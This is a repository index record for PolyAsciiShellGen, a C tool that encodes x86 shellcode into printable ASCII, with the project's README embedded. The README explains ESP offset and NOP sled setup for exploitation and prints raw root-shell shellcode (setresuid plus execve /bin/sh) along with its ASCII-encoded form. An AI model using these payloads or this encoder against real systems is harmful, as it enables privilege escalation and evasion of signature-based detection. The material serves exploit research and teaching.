{"id":15048949,"url":"https://github.com/vincentdary/polyasciishellgen","last_synced_at":"2025-04-10T01:40:41.979Z","repository":{"id":75312243,"uuid":"38923591","full_name":"VincentDary/PolyAsciiShellGen","owner":"VincentDary","description":"Caezar ASCII Shellcode Generator (x86, 32 bits)","archived":false,"fork":false,"pushed_at":"2020-12-19T17:21:36.000Z","size":41,"stargazers_count":31,"open_issues_count":0,"forks_count":8,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-24T03:22:23.349Z","etag":null,"topics":["32-bit","c","c-language","encoder","shellcode","x86","zero-dependency"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/VincentDary.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2015-07-11T11:30:08.000Z","updated_at":"2024-10-23T16:38:26.000Z","dependencies_parsed_at":"2023-06-06T02:45:19.339Z","dependency_job_id":null,"html_url":"https://github.com/VincentDary/PolyAsciiShellGen","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VincentDary%2FPolyAsciiShellGen","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VincentDary%2FPolyAsciiShellGen/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VincentDary%2FPolyAsciiShellGen/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VincentDary%2FPolyAsciiShellGen/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/VincentDary","download_u
rl":"https://codeload.github.com/VincentDary/PolyAsciiShellGen/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248142004,"owners_count":21054574,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["32-bit","c","c-language","encoder","shellcode","x86","zero-dependency"],"created_at":"2024-09-24T21:17:17.937Z","updated_at":"2025-04-10T01:40:41.954Z","avatar_url":"https://github.com/VincentDary.png","language":"C","readme":"# PolyAsciiShellGen: Caezar ASCII Shellcode Generator\n\nFull description and demonstration on this blog post: https://vincentdary.github.io/blog-posts/polyasciishellgen-caezar-ascii-shellcode-generator/index.html\n\n  - [Build](#build)\n  - [Usage](#usage)\n  - [Options](#options)\n  - [Result](#result)\n  - [Return Value](#return-value)\n  - [Exemple](#exemple)\n\n\n## PolyAsciiShellGen\nPolyAsciiShellGen is an experimental ASCII shellcode generator based on\nthe part II of the *Riley \"Caezar\" Eller*'s paper. 
The program takes a classic\nshellcode as input, automates the encoding of the shellcode into ASCII\ncharacters, and assembles an ASCII shellcode able to decode, load and\nexecute the original shellcode.\n\n\n### Build\nClone PolyAsciiShellGen from\n[my GitHub repository [3]](https://github.com/VincentDary/PolyAsciiShellGen)\nand build it.\n\n```text\n$ git clone https://github.com/VincentDary/PolyAsciiShellGen.git\n$ cd PolyAsciiShellGen\n$ make \u0026\u0026 make clean\n```\n\n### Usage\n```text\n$ ./PolyAsciiShellGen\nusage: PolyAsciiShellGen \u003cesp offset\u003e \u003cnop sleed factor N * 4 NOPS\u003e \u003cshellcode \"\\xOP\\xOP\"...\u003e\n```\n\n### Options\n**`\u003cesp offset\u003e`**\n\nThe *`esp offset`* parameter is a 32-bit integer, positive or negative.\nWhen the generated ASCII shellcode is executed, it starts by adding the\n*`esp offset`* to ESP in order to set the register position after its code\nwith enough space to build the decoded shellcode as a bridge to the code of the\nASCII shellcode. This value is generally deduced during a pre-exploitation\ndebugging session. If a NOP sled is added before the decoded shellcode via the\n*`NOP sleed factor`*, the *`esp offset`* value can have a margin of error\naccording to the size of the NOP sled used. Here is the method to compute the\n*`esp offset`*.\n\n```text\n esp_offset = @shellcode_ascii_start_address - @esp_address\n              + ascii_shellcode_size\n              + original_shellcode_size\n```\n\nNote: the `ascii_shellcode_size` must be padded on a 32-bit boundary.\n\n**`\u003cnop sleed factor\u003e`**\n\nThe *`nop sleed factor`* parameter is a 32-bit unsigned integer used as a NOP\nsled multiplier to add an extra NOP sled before the first instructions of the\ndecoded shellcode in order to make the decoded shellcode execution more reliable. This\nfactor is multiplied by four NOP instructions. 
So if N=4, 4*4=16 NOP\ninstructions are added before the shellcode.\n\n**`\u003cshellcode\u003e`**\n\nThe `shellcode` parameter is the shellcode to encode, in escaped format\n`...\\xcd\\x80...`. If the length of the shellcode is not a multiple of four bytes, it\nis padded with extra NOP bytes in order to pass an exploit code aligned on a 32-bit\nboundary to the underlying ASCII shellcode generator.\n\n\n### Result\nPolyAsciiShellGen prints the resulting ASCII shellcode on the standard output. The\nASCII charset used to build the ASCII shellcode is the following.\n\n```text\n %_01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-\n```\n\nTo encode the original shellcode, the underlying encoder uses values generated\nrandomly at each execution. So, the printable shellcodes generated have a\ndifferent signature from the original shellcode at each new generation.\n\n\n### Return Value\nThe command returns 0 if the ASCII shellcode generation is successful or 1 if\nit fails.\n\n\n### Exemple\nHere is an example with a `setresuid(0,0,0); execve(/bin//sh,0,0)` shellcode.\n\n```text\n$ ./PolyAsciiShellGen -270  10  \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\xb0\\xa4\\xcd\\x80\\x31\\xc0\\xb0\\x0b\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x51\\x89\\xe2\\x53\\x89\\xe1\\xcd\\x80\"\nTX-KKKK-KKKK-xjiiP\\%0000%AAAA-9%%%-GJJJP-hhNh-th3%-Q6-5P-yyyZ-yZy6-L6---2-8-P-7KKd-%Kdz-%RkzP-xxxx-GGGx-0AFiP-OOOO-jOwO-iaraP-NN%N-a%%a-q44tP-%SS0-%SL5-7uC%P-FkFF-9pUhP-XXXX-XXXX-PXOFP-AAAj-0w2j-0w-vPPPPPPPPPP\n```\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvincentdary%2Fpolyasciishellgen","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvincentdary%2Fpolyasciishellgen","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvincentdary%2Fpolyasciishellgen/lists"}